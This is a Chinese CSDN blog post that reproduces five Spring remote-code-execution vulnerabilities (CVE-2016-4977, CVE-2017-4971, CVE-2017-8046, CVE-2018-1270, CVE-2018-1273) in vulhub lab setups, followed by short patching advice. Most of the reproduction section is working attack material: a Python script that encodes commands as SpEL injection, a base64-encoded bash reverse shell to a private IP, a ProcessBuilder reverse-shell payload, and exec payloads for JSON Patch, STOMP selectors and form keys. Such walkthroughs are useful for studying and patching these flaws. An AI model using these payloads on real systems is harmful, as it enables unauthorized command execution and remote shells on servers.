Spring框架漏洞复现大杂烩!!!

最新推荐文章于 2024-02-28 17:34:32 发布
最新推荐文章于 2024-02-28 17:34:32 发布
阅读量2.4w 收藏 35
点赞数 12
分类专栏: CVE 文章标签: Sping 远程代码执行 漏洞复现 CVE Sping漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/87951940
版权

Spring框架漏洞复现大杂烩!!!

  • 寻了半生的春天 你一笑 便是了

总体概述:

  • Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞都都是由于OGNL,而自从sping引入SpEL,也引起很多安全漏洞,什么事都是有利即有弊。
  • 本次主要针对以下几个漏洞进行复现(vulhub一键搭建),主要还是由于SpEL表达式而产生的漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

漏洞版本

  • Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
	Spring Security OAuth 2.0 – 2.0.9
	Spring Security OAuth 1.0 – 1.0.5
  • Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
	Spring Web Flow 2.4.0-2.4.4
  • Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

    Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
    Spring Boot version < 2.0.0M4
    Spring Data release trains < Kay-RC3
  • Spring Messaging 远程命令执行漏洞(CVE-2018-1270)

    Spring Framework 5.0 -5.0.4
    Spring Framework 4.3 - 4.3.14
  • Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
	Spring Data Commons 1.13 - 1.13.10
	Spring Data Commons 2.0 - 2.0.5

漏洞概况:

  • Spring Security OAuth是为Spring框架提供安全认证支持的一个模块,主要分为授权服务 Authorization Service.资源服务 Resource Service.这次漏洞主要是由用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意 SpEL表达式来远程执行命令。

  • Spring WebFlow构建于Spring MVC之上,允许实现Web应用程序的“流程”。流程封装了一系列步骤,指导用户执行某些业务任务。 它的最佳位置是具有受控导航功能的有状态Web应用程序,例如购物逻辑,向表单添加确认步骤等。如果我们控制了数据绑定时的field,构造恶意 SpEL表达式来远程执行命令。

  • Spring Data是对数据访问的更高抽象。通过它,开发者进一步从数据层解放出来,更专注于业务逻辑。Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入setValue,导致执行了恶意SpEL表达式,触发远程命令执行漏洞。

  • spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,
    用STOMP协议将数据组合成一个文本流,简单来说用sockjs协议发送文本流,sockjs会选择一个合适的通道:websocket(NEW)或ajax(OLD)进与后端通信。由于selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),造成命令执行漏洞。

  • Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons有一个重要概念:Spring Data Repository抽象。使用Spring Data Repository可以极大地减少数据访问层的代码。当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为SpEL表达式进行注入,攻击者可以注入恶意SpEL表达式以执行任意命令。

漏洞复现:

  • Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
    漏洞这两都可以触发:
    oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test
    在这里插入图片描述
    oauth/authorize?response_type=token&client_id=acme&redirect_uri=${2*2}
    在这里插入图片描述
    然后生成反弹shell的POC,需要把反弹shell语句转化为SpEL语句
#!/usr/bin/env python

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 

poc += ')}'

print(poc)

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAyLzg4ODggMD4mMQo=}|{base64,-d}|{bash,-i}

poc之后生成SpEL表达式,带入表达式即可成功getshell。

在这里插入图片描述

  • Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
    在spring-webflow官方给的简单示例中,订购酒店,然后填写信息后点击“Process”(从这开始,WebFlow就已运行)
    在这里插入图片描述

    然后在点击"confirm",之后抓包,添加反弹shell参数,返回500,即可成功getshell

_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/ip/端口 0>&1")).start()=hellowrod(要url编码,因为有特殊符号)

在这里插入图片描述

  • Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

    首先注意几点:
    1.Content-Type:application/json-patch+json
    2.请求数据必须是json数组
    3.JSON Patch方法提交的数据必须包含一个path成员,用于定位数据,同时还必须包含op成员,可选值如下:

    op含义
    add添加数据
    remove删除
    replace修改
    move移动
    copy拷贝
    test测试给定数据与指定位置数据是否相等

    对于上面添加的Person数据,外面可以修改其lastName属性,请求数据如下:
    [{ "op": "replace", "path": "/lastName", "value": "hellocat" }]
    然后构造payload,path的值是SpEL表达式,

[{ "op": "replace", "path": "T(spel表达式)/lastname", "value": "hellocat" }]

抓包修改OPTIONS,查看接受类型和允许的请求方法。

在这里插入图片描述
把patch换成反弹shell语句,即可成功getshell。
在这里插入图片描述

  • Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
    搭建:git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
    cd complete
    ./mvnw spring-boot:run
    搭建成功,然后开启connect,然后抓包添加payload\nselector:new java.lang.ProcessBuilder("touch /tmp/sucesss").start()即可,然后即可成功执行命令
    在这里插入图片描述

  • Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
    首先在登入页面抓包,发送repeater
    在这里插入图片描述

payload:username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=

然后修改username,进行修改payload数据发送,可以看见成功执行命令。
在这里插入图片描述

漏洞修复:

  • Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
    1.禁用生产环境中的Whitelabel错误页
    2.升级+++

  • Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
    1.建议在视图状态中始终使用显式数据绑定声明, 以防止表单提交在不应设置的目标对象上可以任意设置字段。
    2.升级+++

  • Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)
    升级+++

  • Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
    升级+++

  • Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
    升级+++

    萌新一枚,余生很长,请多指教。
    在这里插入图片描述

SoulCat.
关注
  • 12
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
springcloud1_springcloud技术框架_Eureka!_
10-02
springcloud全家桶框架,eureka
Spring框架漏洞总结
weixin_42345596的博客
08-30 1057
Spring简介 Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL (Spring Expr
最新漏洞Spring Framework远程代码执行漏洞
持 开源思想,撰 必胜所学,望 勤学者,无难处
03-31 4569
Spring Framework远程代码执行漏洞 发布时间 2022-03-31 漏洞等级 High CVE编号 CVE-2022-22965 影响范围:同时满足以下三个条件可确定受此漏洞影响: JDK 版本 >= 9 使用了 Spring 框架或衍生框架 项目中 Controller 参数接收实体类对象并存在代码调用 1.漏洞描述 Spring Framework 是一个开源应用框架,旨在降低应用程序开发的复杂度。它是轻量级、松散耦合的。它具有分层体系结构,允许用户选择组件,同时还为 J2
spring boot 修复 Spring Framework URL解析不当漏洞CVE-2024-22243)
最新发布
记录点滴
02-28 3759
一开始我们尝试直接替换spring-web的版本,但是只替换这一个包的话项目启动会报错,通过实践和反复尝试,我们对spring相关的jar包都进行了覆盖,这样可以保持springboot的版本号不变。如果现有项目的大版本是3.x,直接升级即可,但是有些老项目还停留在2.x的版本,官方并没有针对2.x发布新版本,从2.x直接升级到3.x,代价又比较大。其它已经不受官方支持的版本(5.1.x,5.2.x)同样受到影响,更新到受官方支持的安全版本。查看 springboot的版本,只有最新的。
【网络安全】Spring框架漏洞总结(二)
qq_44005305的博客
01-06 524
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行
spring常见漏洞总结
hongduilanjun的博客
07-21 4513
Spring的英文翻译为春天,可以说是给Java程序员带来了春天,因为它极大的简化了开发。得出一个公式Spring=春天=Java程序员的春天=简化开发。最后的简化开发正是Spring框架带来的最大好处。Spring是一个开放源代码的设计层面框架,它是于2003年兴起的一个轻量级的Java开发框架。由RodJohnson创建,其前身为Interface21框架,后改为了Spring并且正式发布。Spring是为了解决企业应用开发的复杂性而创建的。...
Spring-Core RCE反序列化漏洞原理与复现
FisrtBqy的博客
05-15 1678
Spring-Beans RCE反序列化漏洞原理与复现
Spring框架漏洞
weixin_68408599的博客
12-11 1174
以下框架漏洞均为Spring框架,讲解方式为漏洞产生原因以及漏洞复现,重点是漏洞复现的具体过程。
SpringBoot漏洞
weixin_51151498的博客
01-19 1万+
spring漏洞
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 5569
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 2866
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
spring框架漏洞整理(Spring Framework漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 1391
spring框架漏洞整理之Spring Framework漏洞(CVE-2015-5211)Spring Framework 内容协商机制(content-negotiation)反射型文件下载(RFD)。 RFD,即 Reflected File Download 反射型文件下载漏洞,是一个 2014 年来自 BlackHat 的漏洞。这个漏洞在原理上类似 XSS,在危害上类似 DDE:攻击者可以通过一个 URL 地址使用户下载一个恶意文件,从而危害用户的终端 PC。 这个漏洞很罕见,大多数公司会认为它是
SpringBank:Spring 框架在行动!
06-28
春天银行 在示例银行系统中使用 Spring 框架的技术。
isp-eureka.zip_Eureka!_spring cloud_分布式
09-21
分布式 spring-cloud eureka
Spring、Hibernate搭建的简单框架
10-31
Java web 项目 我使用eclipse写的 导出为一个文件夹 使用了Spring Hibernate 并没有Struts 带分页的公共方法和标签 带需要的Jar包 初始写项目搭建框架的人员可以用来参考或使用
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
热门推荐
SoulCat
01-27 3万+
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5....
phpunit 远程代码执行漏洞CVE-2017-9841)复现
SoulCat
05-28 2万+
phpunit 远程代码执行漏洞CVE-2017-9841)复现 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。 漏洞概述: PHPUnit 是 PHP 程式语言中...
spring框架漏洞
06-09
Spring框架有一些已知的漏洞,这些漏洞可能会影响应用程序的安全性,主要包括以下几类: 1. 远程代码执行漏洞:攻击者可以利用这种漏洞远程执行恶意代码,从而控制服务器或获取敏感信息。 2. 权限许可和访问控制漏洞:攻击者可以利用这种漏洞绕过应用程序的安全机制,访问未授权的资源或执行未授权的操作。 3. 拒绝服务漏洞:攻击者可以利用这种漏洞通过发送恶意请求或攻击服务器,导致应用程序无法正常工作。 为了保证Spring框架的安全性,建议开发人员及时更新框架版本,避免使用过时的版本,以及使用安全的编码实践来防止漏洞的出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值